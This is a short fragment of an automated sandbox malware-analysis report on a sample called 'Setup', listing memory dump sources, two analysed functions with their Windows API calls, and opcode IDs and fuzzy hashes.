                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MessageSend$DialogRectShowWindow_malloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 929715566-0
                                                                                                                                                                    • Opcode ID: 113d7af607e62867ba1558cbae1dcadd13eaccc665fb8d402e802d6439b15fb3
                                                                                                                                                                    • Instruction ID: 3e209c83ec5a52908a294c35acf1367fb3a6c5eec4d5ae4f3fef0ce1343ac48a
                                                                                                                                                                    • Opcode Fuzzy Hash: 113d7af607e62867ba1558cbae1dcadd13eaccc665fb8d402e802d6439b15fb3
                                                                                                                                                                    • Instruction Fuzzy Hash: B3316935A00209AFCB15DF68C849AAEBBF5FF89350F208419F505EB3A0CB359A05CB91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698F1169 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698F1170
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 698F11B1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$DirectorySystem
                                                                                                                                                                    • String ID: C:\
                                                                                                                                                                    • API String ID: 105093994-3404278061
                                                                                                                                                                    • Opcode ID: a135eacea4a1e40f75654ee13c944e3ffee49e5b2707c13fe2ed73cdf7f2777e
                                                                                                                                                                    • Instruction ID: f41d86ad2fc2698f81812da02dd011e0895fb63033e4fc46c5138c0ae4e65521
                                                                                                                                                                    • Opcode Fuzzy Hash: a135eacea4a1e40f75654ee13c944e3ffee49e5b2707c13fe2ed73cdf7f2777e
                                                                                                                                                                    • Instruction Fuzzy Hash: 4C0186B5910129CFDF04DBA8CC54ABEB775FF15328F449918E521A72D0CB30AD06CB90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%